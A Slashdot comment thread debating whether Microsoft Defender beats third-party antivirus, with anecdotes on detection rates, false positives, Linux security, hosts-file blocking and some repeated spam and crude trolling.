Re:Oh really?

[yithar7153]

ChromeOS is technically running the Linux kernel, just saying. It's pretty much Gentoo with a different UI in a sandbox on top.

All code that is natively run is either explicitly vetted by the chain of trust that starts from the embedded controller (the OS and Chrome itself) or permuted such that it cannot escape a narrowly-defined sandbox (NaCl, Pepper plugins, etc). If you have a Chromebook and you're running ChromeOS, it's even better, as the chain of trust starts from the TPM.

Re:Oh really?

[JustNiz]

You presume I'm running Linux? ha.
30 years later and my Amiga still hasn't had a single malwar
+++ CARRIER LOST +++

Re:Oh really?

My buddy used to work in a mixed windows and linux corporate data center. The linux guys always bragged about their uptime and how the windows guys were always having to reboot to patch the security holes.

That is, until the first time they got caught with their pants down not updating their linux boxes with the latest patches and spend the better part of a week rebuilding all their machines. They never grabbed about uptime.

The moral? Whatever OS you use, if you don't properly maintain it, you WILL get pwned.

Re:Oh really?

[RightSaidFred99]

2003 called, it wants its information back.

Windows is very secure, any given set of crap apps you may install on it - not so much.

Re:Oh really?

[JustNiz]

>> Windows is very secure,
Sure it is. NOT.
The whole concept of the registry at all is fundamentally insecure, especially one that apps can write mostly anywhere and read nearly everithing.
Windows security model is also fundamentally borked because its a collection of workarounds on workarounds, mostly because backwards compatibility has been a higher priority than security, and Microsofts total control of your PC has a higher priority than anything, including usability.
Even as admin you can't stop it downloading/applying whatever updates Microsoft feel you should have, or (trying to) phone home to Microsoft and sharing who knows what data about you.
Windows might be a lot of things, but secure it aint.

Re:Oh really?

"loosing all credibility"

Yep, you just lost all of it...

Re:Oh really?

Better to have layers of protection (unpriviledged/sandboxed execution) in the first place. And in general not execute any random binaries.
When you running the binary, user running it at full privileges is at the mercy of AV to catch the malicious execution pattern or fingerprint the virus based on a DB. If a virus is new and does something novel, the victim is out of luck and gets infected, ransomed or having credit card info stolen. Backups and not using credit cards on Windows PCs helps.

Re:Oh really?

Why do you need malware when a single program and take out the whole OS? Now TI-83 calculators modded with ethernet through the mic port are secure enough to browse the web without AV. Don't forget to buy the keyboard attachment too.

Re:Oh really?

[Ol+Olsoc]

What malware authors love most about Linux is your attitude. It prevents you from really looking at your machine.

You managed to devine a lot of what my attitude is from a really short post. You must be psychic.

All Operating Systems have some vulnerabilities. As it turns out Windows has the Lion's share of them.

Re:Oh really?

[Ol+Olsoc]

that works fine until Linux has the market share of Windows. The advantage Linux currently has is security through obscurity.

Took a while, but finally someone brought that up - Security through obscurity is the computer world's version of trickle down economics.

From your information, I can state with great assurance that with the recent botnets of Internet of things devices, that there are more of those devices than machines running Windows. Otherwise, they would be quite secure.

Re:Oh really?

[JustNiz]

..plust having all the benefits of a security model that is from-the-gound-up intended for a multi-user environment.
Also many details like having an architecture where installing apps doesnt require allowing it to modify your operating system, or putting both your app and OS settings in a shared registry that everything can at least read.

Re:Oh really?

[JustNiz]

>>The advantage Linux currently has is security through obscurity.

Thats utter bullshit considering the Linux kernel runs about 99% of the worlds internet servers and smartphones, i.e. all the most connected things.

>> Internet of things devices, that there are more of those devices than machines running Windows. Otherwise, they would be quite secure.

Unlike Windows, IOT issues are all to do with clueless companies releasing products with bad configurations, not fundamental issues with the OS itself.
And further to your point, by far the most infected systems on botnets are actually Windows PCs.

Re:Oh really?

[Ol+Olsoc]

>>The advantage Linux currently has is security through obscurity.

Thats utter bullshit considering the Linux kernel runs about 99% of the worlds internet servers and smartphones, i.e. all the most connected things.

Bullshit it very likely is, but don't attribute to me things that I didn't write. I was replying to a guy and quoted him before my replies. Security through obscurity is something that peopel who cannot get away form teh fact tht Windows is a brittle and insucure system say to make themselves feel better about th eutter piece of shit Operating system that for some reason they defend.

It isn't real. Hopefully I'm clear on that.

"Internet of things devices, that there are more of those devices than machines running Windows. Otherwise, they would be quite secure.

Unlike Windows, IOT issues are all to do with clueless companies releasing products with bad configurations, not fundamental issues with the OS itself.

Sounds like our friends in Redmond. It's exactly how they started out.

And further to your point, by far the most infected systems on botnets are actually Windows PCs.

Dude, you are preaching to the choir - you gotta take that up with the guy who I was replying to.

Big surprise

[Rubinhood]

Developers of new software sometimes bump into false positives, and they are either smart enough to avoid malware or never even notice when one gets past their installed virus scanner. So they prefer one of the weakest virus scanners.
  [acts surprised]

RAV Antivirus?

RAV Antivirus was bought in 2003 by microsoft. Not long after that, microsoft came out with its own antivirus offering. Back in the day, RAV was the best out there, finding and cleaning things the other major makers missed. Hmmm

Re:RAV Antivirus?

[Martin+Blank]

It's actually based on GIANT, not RAV. Both were purchased by Microsoft, but the former was used as the launching point for what would become Windows Defender.

Re:windows 10 spyware says

YOU COW!

Re:Disable ad-blocker for a paragraph of twitter c

Regardless of anyone's particular sentiments on aPK (he doesn't bother me), black-holing garbage domain names (something something hosts file) and IP addresses (if possible) is an excellent source of additional protection.

Sad to say I have no trouble accepting this

[Crashmarik]

After years of pain from the likes of Norton, McCafee, Sophos, Nod32 all of which can make you want to have a virus instead of the antivirus, Windows defender is the only one that hasn't compelled me to rip it out.

I agree!

[Notabadguy]

I think Windows Defender is better than any of the AV out there - and that this signifies that MS has finally found its core competency. It needs to get out of the OS business and stick to AV.

Re:I agree!

They make fairly decent mice too.

Re: I agree!

Microsoft Natural keyboard is just wonderful too.

Utter shite

[wbr1]

Defender may be well behaved in terms of system utilization and other programmatic things like not install browser hooks, etc, but it has a history of being poor at actually catching viruses. Just a year or so ago it had an 85-89% catch rate. That may have improved as it has been a while since I read the literature.

That said, no AV is a poor prospect too, especially for business. I work for a local break-fix shop that also is branching into MSP work for out small to mid biz clients. Out system uses a modified Bitdefender + site blacklisting. It works well but does have a foot print. I say it is useful though because some of our clients are 30-50 seat law firms, insurance companies, and financial institutions - you would not believe how heavily targed they are with social engineer attacks designed to install malware. Mostly through email attachments, but there have been DOS attacks, password attacks against open ports, and DNS redirect attacks.

User training is #1, but AV and good backups have saved the bacon more than once. We see constant removals of crypto virus installers, only 2x in the past 3 years has one actually gotten through by being too new for detection. How many would that be without an AV with a 95%+ catch rate?

Re:Utter shite

[The-Ixian]

Just a year or so ago it had an 85-89% catch rate

That actually seems really good for AV.

No AV is a panacea. It's just one tool in the toolbox. 85-89% is a really good starting place if you ask me. Add to that DNS blacklisting, ad blocking, content filtering, application whitelisting and sandboxing, you could have near 100%.

Re:Utter shite

[wbr1]

85-89% is not good when competitors have above 90 and 95%. Read up on av-test and av-comparatives. I have not read for about a year, so things could have changed, but my clients are specifically targeted, plus the normal random probing and targeting that goes on. That 10% difference can be the difference between normal operations and a 1-2 day shutdown to recover a cryptolocked server from online backups. Our bill is big for that but not nearly as big as not having your entire firm run for 1-2 days.

Re:Utter shite

[Ambassador+Kosh]

From what I could see in a few different tests windows defender is about 97% and there are a few scanners that go to 99.9% but the higher the detection rate the more likely it also is to suffer from false positives and impact the system negatively while running.

Re:Utter shite

[wbr1]

A question... would you rather have a false positive that stops one or two users from using a program, or a false negative resulting in a crypto virus infection that shuts your entire business down? Our customers pay us monthly, and if there are problematic false positives, we can go straight to the appropriate vendors and get it resolved.

We recently worked a case where some vertifore software was conflicting in a strange way with the BitDefender engine. It took a bit to get resolved as it was a deep issue, but now it is fine. We also had issues in the past with a signature collision with a common Quickbooks DLL. That was resolved faster. Is it a pain, yes, but it is less of a pain than recovering 3-5TB of encrypted data and rebuilding a multi site windows domain. I know, I have done both.

Re:Utter shite

Unless you use Kaspersky in which case you have 99.8 or 99,9% detection rates and 1 or 0 false positives. There's a reason they are the best.... The rest are still playing catch up.

Re:Utter shite

too many false positives means that the alerts are no longer taken seriously. "oh, just another false positive. i need to run it now, so let's just deactivate the d*mn scanner"

Re:Utter shite

[roca]

I wrote about the weaknesses of the AV-Comparatives tests here: http://robert.ocallahan.org/20...
Testing against only already-identified malware is bogus. But FWIW, Defender has a 97% catch rate in AV-Comparatives' latest report.

Re:Utter shite

The catch rate isn't such a useful statistic any more. When using Defender (or some other AV) the median user doesn't get infected. The reason is that operating systems and browsers have become a lot better, so the initial hurdle for a virus to get on the system at all is so high that the AV doesn't even come into it.
And AVs have downsides as well, so at this point I think it's better to pick the one with the least downsides. Defender doesn't seem to be a big resource hog, it doesn't throw pop-ups in my face, it doesn't break other security and it doesn't cause other software to crash.

Re:Utter shite

[wbr1]

Good info to have. When I do read on the subject it is only one source. av-test is another. The third is decidedly more anecdotal and subjective, but we see a lot of infected PCs here, with a lot of different AVs. so you do get some clues that way as well.

Re:Utter shite

[Martin+Blank]

If your clients are specifically targeted, no AV is likely to catch the attacks. AV is there to catch the low-hanging fruit, not the ones coming after you specifically.

Re:Utter shite

[Ambassador+Kosh]

I have had AV software have false positives on software I was compiling and it would delete it immediately. I even tried to mark that area as safe but to no avail. I ended up getting rid of the AV software since I could not get work done that way.

I have also run into AV software where a bad update went through and the software ended up attacking the OS and did quite a lot of damage in terms of downtime.

At the end of the day it is easier for me to avoid viruses than it is to deal with most AV software I have encountered and the one built into windows seems to do a good enough job. The email I get comes through gmail and it seems to do an excellent job of filtering away the spam, malware etc and the software I download from intel, mathworks, nvidia lawrence livermore labs etc is very unlikely to be infected.

Re:Disable ad-blocker for a paragraph of twitter c

If a popup asked you to disable your firewall or your AV, would you have done that?

Re:Disable ad-blocker for a paragraph of twitter c

Indeed and my preferred is uBlock Origin. Though I have grown rather fond of drives/etc/hosts. Unlike those claiming a large hosts file degrades performance a bit I haven't noticed that of any sort. While Microsoft's Defender may not be the most "robust" (read system hog). I think the combination of those three works very well and potentially negates any ill effects of a large hosts file.

Antivirus is useless

All the people who need antivirus software still get infected and the people who don't get infected without it obviously don't need it. Antivirus is CYA-software. Nobody is going to tell you not to use antivirus software, because everybody likes their ass covered. We've done what we can, if it still happens, it's someone else's fault. Yeah, right. You're not supposed to unzip the executable file and run it, just because the email says you're going to get sued if you don't pay the attached overdue bill, DUMBASS.

I switched all my Windows machines to Defender

[jfdavis668]

I was always a fan of Symantec. Their entire suite became a huge resource hog. But, it was always better in antivirus tests. Once I found out that Microsoft stops checking for viruses where the exploit has be fixed in Windows, that made sense. Defender just stopped checking for viruses that will do no harm to the system. Drops the overhead dramatically.

Use GNU/Linux

[zakzor]

I don't use any AV software. I don't need to. I have ClamAV in a live session for customers. And that way there's no files locked.

Re:Use GNU/Linux

[DrXym]

That's great and every one can all do the same with absolutely no consideration at all of what they bought the computer for.

Re:Use GNU/Linux

What's the longest period of time between Linux security patches? Don't claim your system is secure, no one's is.

There is more to an a/v...

[QuietLagoon]

...Browser makers don't complain about Microsoft Defender because we have tons of empirical data showing that it's the only well behaved AV....

There is more, a lot more, to an a/v than what is seen via the myopic view of a browser developer.

Re:There is more to an a/v...

[thegarbz]

Yeah. All those other things that most AV vendors do like forge SSL certificates, behave like rootkits, open your emails before you even click on them (hell even Microsoft stopped this 10 years ago), bypass firewalls and other parts of windows, set themselves up as essentially impossible to remove. ...

Defender is missing all those features.

Re:Disable ad-blocker for a paragraph of twitter c

[jason777]

Did they also give ya the subscribe to the newsletter popup for the ultimate trifecta?

Re: MicroShaft

They're not glorifying effectiveness (though most testing shows they all are pretty equal now) instead they're explaining that Microsoft's solution behaves well with applications which is generally true as it's less invasive.

As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the other's I've used.

Don't get your panties in a bunch.

Sure! It's okay to settle for Defender!

[Chas]

As soon as you agree to compensate my clients for lost data when ransomware sneaks in under Defender's nose, maybe I'll pay attention to that brown stuff you're spewing.

Re:Disable ad-blocker for a paragraph of twitter c

[thomn8r]

let us know if you see any misbehaving ads

Yeah - too late by then. Buh-bye!

There is another way: Cylance

Cylance does not work in the same manner of traditional AV programs. I'll not go into details here, you can google it if you are interested. It is not a resource hog at all and is resistant to zero-day vulnerabilities. Give it a whirl (caveat: it's enterprise only for now). I have no relationship to the company, but I work in enterprise IT and my company has done a 2K node deploy switching from Kaspersky to Cylance with great success: it stops ransomware, it's resource usage is minuscule, it was easy to deploy, there are few updates to worry about, it's centrally manageable. It ain't cheap though, but it does do AV better than anything else I've encountered.

Worse than Nagware

About a month ago, I received some updates to some of the programs I normally run. Windows Defender thought they were suspicious and asked me whether to submit them for further analysis. A few hours later, Windows Defender detected those same programs and wanted to submit them for analysis. A few hours after that, Windows Defender had an Alzheimer's and asked to submit those same files again. A few hours after that... repeat this for about a week.

Windows Defender should be keeping track of all the files submitted. If the md5sum(suspiciousfile) (or better hash algorithm) was already submitted on this computer, do not ask to submit it again. I do not need to be asked multiple times to submit the same files because all it does is make me want to switch to a different AV solution. I am sure Microsoft's AV specialists would appreciate not receiving multiple copies of the same file from one user either.

Re:MicroShaft

[unixisc]

AC, where did you read Beau's name? msmash posted this. You might have had more credibility had you gotten at least THIS right

Kindly Fuck Off Web Browswer Devs that Enable Malw

The real problem is the fact that the web is now just a bunch of horrible code being run and installed on your machine constantly. Instead of designed for security and convenience, things are now designed on greed and screw all the end users. 98% of the population gets malware because of this. It's the evil type of devs that are killing the www world, the PC, and the sanity of the human race!

Re:Disable ad-blocker for a paragraph of twitter c

[Zocalo]

Black-holing garbage domains (ad sources and trackers especially) is definitely a good idea but the problem with a hosts file is that you can't do wildcards, so while you can easily block "foo.domain.com" and "bar.domain.com", you can't block "{random string}.domain.com" unless you know what "{random string}" is in advance - to do that requires either a DNS based blocklist or some other software tool. That's getting to be a problem given that marketing/tracking companies are slowly (and it's taken them long enough) waking up to the possibilty that you can use "{random string}" as a wildcarded DNS entry to track whether a link was looked at or not just as effectively as a custom URL or cookie.

Also, to add to the GP's comment about the importance of an Ad-Blocker, let's not forget blocking auto-run of certain browser plugins and the ability to whitelist sites that can run JavaScript / save cookies.

Hosts file and my gaping ass hole

Look at a link to a retarded comment I made so long ago the internet forgot about it /https://it.slashdot.org/comments.pl?sid=9995967&cid=53488785b

APK Hosts File Engine 9.0++ SR-5 32/64-bit is all you need. It generates a new hosts file nightly from the shit splatter when I sodomize a cat

You are all Cows. Cows say MOO. MOO MOO.

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively all while redirecting you to pictures of my gaping ass hole.

Thank you GNAA and Happy Wednesday from the Golden Girls

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

Re:Sure! It's okay to settle for Defender!

So you will agree to compensate my clients for lost data if they install your preferred AV? If so, you are a moron.

The solution is worse than the problem

[danbert8]

Anti-virus suites have one huge problem. They are worse than getting a virus. At least a virus tries to hide and not kill your system. AV programs have no such respect for the users.

Re:Disable ad-blocker for a paragraph of twitter c

At least they are kind enough to provide a "Continue without supporting us" link unlike WSJ SJW.

Definitely agree

[Ambassador+Kosh]

I had bitdefender installed on my machine about a year ago and I was writing c++ HPC software. Everything was compiled with the Intel compiler and mkl with profile guided optimizations. Bitdefender started detecting my binaries as virus infected and deleting them. This happened a few times and I disabled it for a month and later turned it back on with newer virus definitions and the same issue kept happening. It even detected some of the binaries I had on a shared drive and deleted them also.

The false positive rate on some of these scanners is just too high.

I will just stay with windows defender since it has not interfered with any of my debugging or profiling and has never deleted the software I am compiling.

Re:Definitely agree

I had an AV program flag a hello world program I wrote in x64 assembler. Seriously. I couldn't believe it. I was writing the program to learn the differences between 32-bit and 64-bit assembler and it flagged a hello world program.

I sent the code to the AV vender and they fixed the detection.

It's about internet filtering

[grahamtriggs]

Strongly suspect the main reason the browser developers like Microsoft Defender as a "well behaved" AV is because it's purely a file level defence, and so doesn't interfere with the behaviour of the browser. Unlike many third party AVs, that will intercept internet traffic, looking for bad stuff before it hits your browser.

That's good from a browser point of view, because they don't have to deal with browsing problems being caused by the AV engine (for example, without whitelisting, ESET's engine will cause logins to my wireless router's web interface to break).

But it's not so good from an end user perspective, when malicious content is attacking the HTML / Javascript engines. There are trade offs to however you choose to manage your security, but I suspect for most people, actually using a good 3rd party paid-for AV is a good balance of having reasonably good protection without having to be overly pro-active in managing it.

Re:It's about internet filtering

Bingo!!!! For a modern AV to be good it cant be file focused. It has to integrate with the browser. This integration obviously is no fun for browser developers who are the ones complaining.

I agree witht hat

[DrXym]

Defender just gets on with its job with relatively little overhead or other intrusion. The same cannot be said of virtually any other AV suite. Even the "reputable" ones like McAfee, Norton etc seems to exist as a form of crapware these days and are so bloated and slow that any protection comes at a high price.

Microsoft Defender most well-behaved security suit

[khz6955]

Well, it would be considering the Defender developers have full access to Windows.

I'll believe it when..

[ITRambo]

I'll believe it when AV-Test.org and AV-Comparitives.org show that Defender actually blocks viruses as well as the top performers do. Currently, it's at the bottom of the barrel for effectiveness, well behaved, or not.

Re:I'll believe it when..

The difference won't matter as much after you train your family and employees not to click on every flashing link on the internet and open every email attachment they are sent.

If all of your family members and employees are too stupid to grasp this concept though then yes, your charts start to matter.

Anti-vaxers have hit computers...

These articles sound a lot like antivaxxers...except for computers

Idiotic, shortsighted report

What this report completely fails to address is the utter uselessness of Defender as an anti-virus tool. It has the lowest hit record of any AV product, even lower than Norton's. In other words, it is totally useless and is almost guaranteed to ensure any machine relying on it will get infected at some point.

What kind of crap hardware do you need to run to

What kind of crap hardware do you need to run to notice the resource drain from an AV suite in 2017? I'm sitting on like a 4-5 year old i5-2400 and it's running Kaspersky and I cant detect any performance drain at all. Like in 2002 when I was running a 1200mhz Athlon with 256mb or ram yeah AV could and would massively slow down the system. Today? You have to be running decade old hardware for this to be an issue.

Re: MicroShaft

[Khyber]

"As a former developer of web browsers (6 years of it), I can confirm that from a developer's point of view, Microsoft hooks more cleanly into the sockets API than the other's I've used'

As a typical computer user with basic fucking logic, NO DUH Microsoft can more cleanly hook into its own API than others.

Re:Disable ad-blocker for a paragraph of twitter c

[wasteoid]

Agreed. Twitter is an utterly useless site.

Re:Disable ad-blocker for a paragraph of twitter c

A large hosts file over 1mb on windows conflicts with the DNS caching service - disable the DNS caching service and it works fine. That's what they're referring to. I'm no fan of DNS caching anyway.

Re:Disable ad-blocker for a paragraph of twitter c

[Khyber]

Large anything degrades performance. Period. The larger it is, the more resources it uses.

Hosts is garbage in the world of IPv6. Hosts is a piece of insecure shit cobbled together from the late 90s meant to identify computers on a local network with a name instead of IP address, and any serious security person never uses it as it's bypassed by the OS at will (and several programs with the right calls) now days anyways.

the singular of anecdote

[epine]

I read the entire thread up to my standard filter level, and this is what I concluded: the singular of anecdote is "one size fits all".

It's pretty clear from what I've read here that for a low-value target, I'd just settle for the low-hanging fruit of Windows Defender, ad blocking, a DNS block list, etc.

It's also pretty clear that for a high value target (e.g. law firm, bank) where the minimum system install is a bulked-out i7 I'd elect to suffer the bloat & obtrusiveness in order to obtain the somewhat better catch rate of a first-tier third-party solution. The people working for these kinds of institutions are pretty demoralised to begin with, it will just look like business as usual (and so it is).

The other side of this is that "one size fits all" is directly connected to the competency porn carapace. "Well, I work for banks and law firms and YOU can't handle the truth". But what actually gets written is this "YOU can't handle compensating my clients for a 48-hour loss of service". This tends to be a person whose amygdala has swollen to such a painfully large size that he or she can no longer multiply 1% times 365 (the constant friction of a badly behaved "solution") and can only multiply 100% times 2 days (as specified under the total availability-loss Weimar Reparations Act).

Someone has obviously not used BitDefender

[kriston]

Someone has obviously not used BitDefender.

Re:Someone has obviously not used BitDefender

BitDefender managed to ignore the settings I gave it instructing it not to delete files without my say so. On several occasions it did so anyway. These files were completely harmless (and IIRC I made a few of them).

Other files that it quarantined were no longer available to me after the subscription expired. If I wanted them back, I would have to send them to Bitdefender, regardless of whether or not the files were private. In fact, I had to tear apart a few database files just to figure out which files were which.

It pulled some other crap on me that I can't recall off the top of my head. However, the bottom line is that BitDefender thinks it knows better than you, even when it doesn't, and as such it acts like it has rabies. The free version is even worse; IIRC it lacks even the minimally-effective controls I tried to use to reign it in. Apparently if you do much of anything that might be considered "advanced" with the computer, e.g. using security and networking tools, it decides that it's not going to let that happen, no matter what it was set to do before.

Absolutely agree...

[bradley13]

I haven't run any virus checker other than the one built-in to Windows for years now. They all catch old or obvious viruses. None of them is going to catch a new, clever virus. There's not a whole lot in the middle. Add in the virus-like behavior of the AV itself, the performance-suck of most of them, and it just doesn't make any sense to use them.

As another poster pointed out: user error is the biggest cause of virus infection. Train your users, use Windows Defender as a sort of "sanity check", make regular backups, and call it a day.

Best behaved antivirus (you fully control it)

See subject: Prevention is the best medicine (& what you can't touch can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

Ads & malware rob speed, security & privacy

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

* Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

I must confess...

[John.Banister]

I have a strong instinct to take it with a bucket of salt when a stranger on the internet tells me "oh yeah, you should ditch your AV."

Re: MicroShaft

[MightyMartian]

I think it's a bit more than just "Microsoft unfair advantage". Other AV products have always been monstrously bloated affairs, and have become all the worse over then last decade as they throw all kinds of other shit like firewalls and the like in. Products like mcafee and Norton have become almost as bad as the disease they purport to treat. So far as I can tell, Defender really doesn't do much more than sniff out viruses and malware, and while I agree Microsoft's insider knowledge probably gives it a bit of an edge, I think the narrower intent of the software has a lot to do with its better performance.

Anecdotal evidence

[Simulant]

I've been running my company on MSE/FEP/Defender for the past 6 years with zero headaches caused by the anti-virus software itself and an infection rate of maybe 5 or 6 per year across 200 PC and laptops. Users have local admin rights. Perimeter IDS catches some things that get through.

It seems to work better than any other anti-virus I've used and I hate them all. It's certainly the least annoying.

Not saying much

[Tablizer]

In the land of the Blind-and-Stupid, those that are only blind or only stupid have an advantage.

Insert presidential election comparison here.

Is Windows Defender also malware?

[Futurepower(R)]

Questions:

Does Windows Defender try to do other things besides defending?

Does Microsoft use Windows Defender as a way of gaining control over a computer?

Re:Is Windows Defender also malware?

Does Windows Defender try to do other things besides defending?

No, unlike some components of Windows ("Cortana Support Systems" or whatever they decided to rename the basic local search executable), Windows Defender has a very clear and explicit role that it does not exceed.

Does Microsoft use Windows Defender as a way of gaining control over a computer?

No, it does not have the interfaces to do that. They could easily have an admin backdoor in the remote desktop code, that would be a much better place to put "gain control over a computer" routines because it already is a program to let someone somewhere else gain control over a computer.

Here's the real kicker that some here are afraid to admit: Microsoft doesn't want control over your computer, the most they want is information on how to be either a middleman or true supplier for the things you want to buy. That includes things like aggregated UI activity to determine which of the 6 ways to open a file you are using most often, so they can see if some of their designs are going completely unused. It also includes more attention to search queries than I prefer, but still much less extensive than Google's buyological profiling system.

Re:Sure! It's okay to settle for Defender!

[Chas]

Sorry, but in business, if you care about your data you go belt AND suspenders.

You run a multi-layer backup strategy.
You run antivirus.
You don't use "server" devices as someone's workstation.
Etc, etc.

Sure, your chances, especially with an intelligent, tech-savvy userbase are tiny.
But security is about more than just obvious stuff. And if you can catch corner-cases, so much the better. Less effort and cost for the client in the long run.

Well behaved doesn't mean it is good at benchmarks

[Phaid]

Antivirus software is a hot topic in IT security right now. Not because you need AV, but because most AV is terribly designed and breaks security in other applications. And while Windows Defender may not score particularly well on canned tests used by AV reviewers, it doesn't break as much software as other AVs do.

Remember that in order to work, AV has to inject itself all over the place in your system to intercept network activity, disk activity, etc. But if it does that at the expense of other security measures, is it really helping? As Justin Schuh said in his linked post, when Firefox implemented Address Space Layout Randomization (ASLR) to guard against buffer overflows, lots of AV suites disabled it by replacing Firefox's DLLs with their own which didn't feature ASLR. This stuff happens all the time, because AV vendors are always behind the curve in browser security compared to browser developers. Which isn't all that surprising if you think about it.

The upshot is, all AV software is pretty terrible. MS Defender isn't as good as some other AV suites at passing the canned tests that AV review sites throw at them. But at least it doesn't work against web browsers' built-in security measures.

Re:Disable ad-blocker for a paragraph of twitter c

Run your own local DNS server - even on a pi - and you can block everything from TLDs down.

yeah right

Their disregard for security and privacy makes them be silly like this. MS cr*p maybe best for them because it offera no protection whatsoever to the end user....

Microsoft managers have little social ability?

[Futurepower(R)]

Thanks for your reply.

"... the most they [Microsoft managers] want is information on how to be either a middleman or true supplier for the things you want to buy."

That seems correct to me. However, it seems to me that Microsoft managers have little social ability. They can be self-destructive and not detect that they are being self-destructive. One example: In Windows 10, Microsoft tries to sell "APPS" to people who are employees of companies doing routine work.

It seems to me that Microsoft managers saw the success of Google's Android and search abusiveness, and wanted some of that success for themselves.

Re:Microsoft managers have little social ability?

[david_thornley]

The big problem Microsoft has here is that their people just don't seem to understand the difference between a phone and a desktop, and are going for a one-size-fits-all solution, unlike Apple and its iOS/OSX approach. After all, if you buy limited apps for your phone that are designed to work on a small touch screen, that must be what you want for your computer with 4K monitor, keyboard and mouse, right?

So WTF

All of sudden the push to do away with AV. After reading security alerts all the time about this or that now the propaganda is to lower my defenses, drop av and let everyone have at it with my systems?

prove it!

Re: MicroShaft

[ctilsie242]

The thing about AV... it is there mainly to tick off a checkbox. Does it actually work? At best, it might catch a moldie oldie, but in reality, it will do nothing against major infection vectors like malvertising. In my experience, an ad blocker, setting "click to play" for content, and something like NoScript is far more effective than any AV will be. Mainly because when the AV utility detects things, it is usually too late.

So, because AV really can't do that much, might as have it use as little resources as possible and still at least be minimally effective against non zero-days.

Not Really Surprised

[EndlessNameless]

Most AV software is bloated crap that offers little actual security.

Microsoft has been focusing on power efficiency and battery life, so I'm not surprised if they traded off a little detection capability in order to run smoother.

Antivirus isn't even on the top of the list for avoiding an infection. That would be (1) don't browse as admin, (2) keep software updated, and (3) use an adblocker or filtering proxy.

With the vast majority of malware being drive-by downloaders, a good adblocker or filter offers more security and better performance. Antivirus is for suckers these days.

Serious host protection includes active IPS and/or application whitelisting, often in lieu of antivirus.

Hosts do it OUT of browser, better/faster

In kernelmode faster IP stack level: Prevention is the best medicine (& what you can't touch can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

Ads & malware rob speed, security & privacy

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

* Using what you already NATIVELY - doing more for less vs. other methods.

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

This prevents that bigtime via hosts

Prevention is the best medicine (& what you can't touch can't hurt you) via APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

Ads & malware rob speed, security & privacy

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

* Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

Re: Disable ad-blocker for a paragraph of twitter

Hosts file is from early 1980s dummy, it predates DNS. Get off my lawn

Hosts do more for less vs. addons & faster

What hosts do addons can't (or as well):

PROTECT vs.:

1.) bad sites (past ads)
2.) fastflux C&C
3.) dynDNS C&C
4.) DGA C&C
5.) DNS down
6.) poisoned dns
7.) trackers (dnsrequestlogs/ads/transparent ISP proxy)
8.) spam/phish payload
9.) dns blocks
10.) slowdown 2 ways: adblocks & hardcodes

11.) Multiplatform
12.) Ez data edit
13.) Efficiency (cpu/ram/I-O)

14.) UBlock no DNS bennys = poor imitation = "sincerest form of flattery"
15.) NoScript tag parses. Hosts block ad script before it downloads!

APK

P.S.=> AB+ 151mb http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

UBlock 64MB http://cdn.ghacks.net/wp-content/uploads/2014/06/adblocker-memory-consumption.jpg/

(hosts ~6mb)

ClarityRay defeatable

Don't work http://www.businessinsider.com/google-microsoft-amazon-taboola-pay-adblock-plus-to-stop-blocking-their-ads-2015-2/

SLOWER: http://superuser.com/questions/686041/which-leads-to-faster-browsing-an-ad-blocker-or-an-edited-hosts-file/

For the best possible hosts file

APK Hosts File Engine 9.0++ SR-5 32/64-bit https://www.google.com/search?hl=en&source=hp&biw=&bih=&q=%22APK+Hosts+File+Engine%22+and+%22start64%22&btnG=Google+Search&gbv=1/

Ads & malware rob speed, security & privacy

Hosts add speed (hardcodes/adblocks), security (bad sites/poisoned dns), reliability (dns down), & anonymity (dns requestlogs/trackers) natively

Less power/cpu/ram + IO use vs. DNS/routers/addons/antivirus + less security bugs/complexity

* Using what you already NATIVELY have, built into your TCP/IP stack running in FASTER kernelmode!

APK

P.S. - Safe https://www.virustotal.com/en/file/e01211ca36aa02e923f20adee0a3c4f5d5187dc65bdf1c997b3da3c2b0745425/analysis/1433430542/

Re:Disable ad-blocker for a paragraph of twitter c

Use this link if you don't want to turn off your ad blocker.

Duh. This has been true for years.

[DarthVain]

